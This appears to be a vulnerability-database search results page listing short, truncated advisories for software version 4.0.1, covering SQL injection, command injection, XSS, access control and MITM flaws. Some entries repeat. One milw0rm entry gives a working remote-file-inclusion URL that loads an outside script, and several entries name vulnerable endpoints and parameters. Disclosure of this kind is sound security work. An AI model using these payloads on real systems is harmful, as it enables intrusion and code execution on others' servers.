20 matches found
CVE-2024-29725
SQL injection vulnerabilities in SportsNET affecting version 4.0.1. These vulnerabilities could allow an attacker to retrieve, update and delete all information in the database by sending a specially crafted SQL query: https://XXXXXXX.saludydesafio.com/app/ax/sortbloques/, parameter list...
CVE-2024-25811
An access control issue in Dreamer CMS v4.0.1 allows attackers to download backup files and leak sensitive information...
Go JOSE vulnerable to Improper Handling of Highly Compressed Data (Data Amplification)
Impact: An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size, whichever is larger. Thanks to Enze...
CVE-2024-25811
Dreamer CMS v4.0.1 contains an access control flaw that can allow attackers to download backup files and leak sensitive information. The issue is described across sources (including Red Hat and NVD records) as an access-control error affecting Dreamer CMS 4.0.1. There is no detailed root-cause br...
CVE-2023-46886
Dreamer CMS before version 4.0.1 is vulnerable to Directory Traversal. Background template management allows arbitrary modification of the template file, allowing system sensitive files to be read...
CVE-2020-11024
In Moonlight iOS/tvOS before 4.0.1, the pairing process is vulnerable to a man-in-the-middle attack. The bug has been fixed in Moonlight v4.0.1 for iOS and tvOS...
CVE-2020-11024
In Moonlight iOS/tvOS before 4.0.1, the pairing process is vulnerable to a man-in-the-middle attack. The bug has been fixed in Moonlight v4.0.1 for iOS and tvOS...
CVE-2020-7057
CVE-2020-7057 affects Hikvision DVR DS-7204HGHI-F1 running V4.0.1 build 180903 web interface. The login endpoint ISAPI/Security/sessionLogin/capabilities returns different responses for failed login attempts based on whether the username exists, enabling user enumeration. The description states o...
Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU - Jan 2016 - Includes Oracle Jan 2016 CPU affect Content Collector for Email
Summary: There is a vulnerability in IBM® SDK Java™ Technology Edition, Java™ Version 6 and Java™ Version 7 that is used by Content Collector for Email. These issues were disclosed as part of the IBM Java SDK updates in January 2016 and include the vulnerability commonly referred to as “SLOTH”...
Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU - Apr 2016 - Includes Oracle Apr 2016 CPU affect for IBM Connections
Summary: There is a vulnerability in IBM® SDK Java™ Technology Edition, Java™ Version 6 and Java™ Version 7 that is used by Content Collector for IBM Connections. This issue was disclosed as part of the IBM Java SDK updates in January 2016. Vulnerability Details: CVEID: CVE-2016-0264 DESCRIPTION: A...
Command injection
On certain Ubiquiti devices, Command Injection exists via a GET request to stainfo.cgi aka Show AP info because the ifname variable is not sanitized, as demonstrated by shell metacharacters. The fixed version is v4.0.1 for 802.11 ISP products, v5.3.5 for AirMax ISP products, and v5.4.5 for AirSyn...
CVE-2010-5330
On certain Ubiquiti devices, Command Injection exists via a GET request to stainfo.cgi aka Show AP info because the ifname variable is not sanitized, as demonstrated by shell metacharacters. The fixed version is v4.0.1 for 802.11 ISP products, v5.3.5 for AirMax ISP products, and v5.4.5 for AirSyn...
CVE-2010-5330
On certain Ubiquiti devices, Command Injection exists via a GET request to stainfo.cgi aka Show AP info because the ifname variable is not sanitized, as demonstrated by shell metacharacters. The fixed version is v4.0.1 for 802.11 ISP products, v5.3.5 for AirMax ISP products, and v5.4.5 for AirSyn...
Security Bulletin: Cross-site scripting vulnerability in WebSphere Application Server admin console in IBM Content Collector for Email
Summary: IBM WebSphere Application Server is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. Vulnerability Details...
Responsive Matrimonial Script 4.0.1 - SQL Injection
Exploit Title: Responsive Matrimonial Script v4.0.1 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/responsive-matrimonial/ Demo: http://74.124.215.220/responsivematri/ Version: 4.0.1 Tested on: Win...
GPS Tools v4.0.1 - SQL Injection
GPS Tools v4.0.1 - SQL Injection. Developer release statement to the vel team: https://www.corejoomla.com/news/1163-gps-tools-v4-0-2-is-released.html...
SendStudio 4.0.1 Cross Site Scripting
Title: SendStudio v4.0.1 Multi Vulnerability | Author: indoushka | Home: Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | Total alerts found: 2 | High :...
SendStudio v4.0.1 Multi Vulnerabilities
No description provided by source. Title: SendStudio v4.0.1 Multi Vulnerability | Author: indoushka | Home: Souk Naamane - 04325 - Oum El Bouaghi - Algeria -0021377181886...
[BMSA-2009-01] Authentication bypass in Interspire Shopping Cart v4.0.1 and below
BLUE MOON SECURITY ADVISORY 2009-01. Title: Authentication bypass in Interspire Shopping Cart. Severity: Critical. Reporter: Truong Van Tri and Blue Moon Consulting. Products: Interspire Shopping Cart v4.0.1 Ultimate edition. Fixed in: v4.0.2. Description...
Boite de News 4.0.1 - index.php Remote File Inclusion
Boite de News v4.0.1 Remote File Inclusion Vulnerability. Download: ftp://ftp1.comscripts.com/PHP/1801boiteden-401.zip Found By: the master exploit: http://Target/Path/boitenews4/index.php?urlindex=http://cmd.gif? milw0rm.com 2006-08-09...